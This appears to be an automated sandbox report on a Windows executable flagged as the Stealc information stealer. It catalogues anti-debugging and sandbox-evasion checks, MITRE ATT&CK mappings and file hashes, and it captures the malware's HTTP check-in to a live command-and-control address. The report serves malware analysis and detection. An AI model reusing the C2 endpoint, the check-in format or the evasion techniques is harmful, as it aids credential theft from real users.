                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 957B00 second address: 957B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 957B04 second address: 957B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 957C70 second address: 957C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 957C76 second address: 957CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5092E67h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7A19D9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 95DE18 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9D48B3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00554570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00553EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00541160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2174797423.0000000001099000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwareUjOz
                Source: file.exe, 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2174797423.0000000001053000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13607
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13604
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13658
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13626
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13618
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005445C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: AProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00557B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00556920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00557850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00557A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2748, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix, listed per tactic (a number before a technique is the count of signatures that matched it):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php~ | 16% | Virustotal | -
http://185.215.113.37/e2b1563c6670f193.phpL | 17% | Virustotal | -
http://185.215.113.37/e2b1563c6670f193.phpd | 17% | Virustotal | -
http://185.215.113.37/ws | 17% | Virustotal | -
http://185.215.113.37/e2b1563c6670f193.php7 | 17% | Virustotal | -
http://185.215.113.37/e2b1563c6670f193.phpK | 17% | Virustotal | -
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php~ | file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.phpL | file.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.phpK | file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2174797423.000000000100E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37e | file.exe, 00000000.00000002.2174797423.000000000100E000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.phpd | file.exe, 00000000.00000002.2174797423.0000000001088000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.phpft | file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
http://185.215.113.37/e2b1563c6670f193.php7 | file.exe, 00000000.00000002.2174797423.000000000106A000.00000004.00000020.00020000.00000000.sdmp | true | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1523815
                    Start date and time:2024-10-02 05:01:09 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 80%
                    • Number of executed functions: 19
                    • Number of non-executed functions: 85
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                    No context
                    No context
                    No created / dropped files found
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.951358282912511
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'860'608 bytes
                    MD5:2252ee92f584848eac43445204fec9a4
                    SHA1:411ee89cbdcd58f985efce1c042d851b391c5643
                    SHA256:00f85df4b3b992ef1030c3b26626c3bd961f66eabfc26b9c49d52953415d288b
                    SHA512:b3da7770e51cf346c7492dd56ea0852b4002e801097a58d90c5b26adfc35fb814571c723e15495821af7470ce3febb8bf219bd4b7e7060448139b62e3c58d5ed
                    SSDEEP:24576:eXhk2UMJ30ZhbqaZulyAdmKTgBfRWAAbd1GYhqUb7Y8PuHCZVJd2RDWHYhU3Bt2b:eXKXm0X1GmvHrAZQjiZV2pW4hw69ci
                    TLSH:4D853396B62EE7A4CAE800B09DB243DD03B637410C883CD35B9972A19D2FF754DB9E45
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                    Icon Hash:00928e8e8686b000
                    Entrypoint:0xaa7000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 82dba94a54223d7fa0cc3857955d6be6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a7000 | 0x200 | d3f96306eb4c4cc00f34072a728b82ad | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hxrvraam | 0x505000 | 0x1a1000 | 0x1a0200 | b37624aef7c41b86e0d6c7bf32b13b7b | False | 0.9949960339065785 | data | 7.954518542392513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mezjsajj | 0x6a6000 | 0x1000 | 0x400 | adf8aec738b37f6337c21d1bc231e502 | False | 0.7333984375 | data | 5.819652837459116 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a7000 | 0x3000 | 0x2200 | c5e4bc3dbaa72ba54702d4be62cec4db | False | 0.09099264705882353 | DOS executable (COM) | 1.0812336285801456 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T05:02:05.423757+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 2, 2024 05:02:04.503863096 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
Oct 2, 2024 05:02:04.508725882 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
Oct 2, 2024 05:02:04.508797884 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
Oct 2, 2024 05:02:04.509346962 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
Oct 2, 2024 05:02:04.514132977 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
Oct 2, 2024 05:02:05.198018074 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
Oct 2, 2024 05:02:05.198132038 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
Oct 2, 2024 05:02:05.201461077 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
Oct 2, 2024 05:02:05.206314087 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
Oct 2, 2024 05:02:05.423692942 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
Oct 2, 2024 05:02:05.423757076 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
Oct 2, 2024 05:02:07.911515951 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                    • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | 2748 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 2, 2024 05:02:04.509346962 CEST | 89 | OUT | GET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
Oct 2, 2024 05:02:05.198018074 CEST | 203 | IN | HTTP/1.1 200 OK
                    Date: Wed, 02 Oct 2024 03:02:05 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
Oct 2, 2024 05:02:05.201461077 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJE
                    Host: 185.215.113.37
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 37 30 38 42 38 41 36 37 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 2d 2d 0d 0a
                    Data Ascii: ------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="hwid"1A708B8A679D1524750037------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="build"doma------AECFCAAECBGDGDHIEHJE--
Oct 2, 2024 05:02:05.423692942 CEST | 210 | IN | HTTP/1.1 200 OK
                    Date: Wed, 02 Oct 2024 03:02:05 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=



                    Target ID:0
                    Start time:23:02:00
                    Start date:01/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
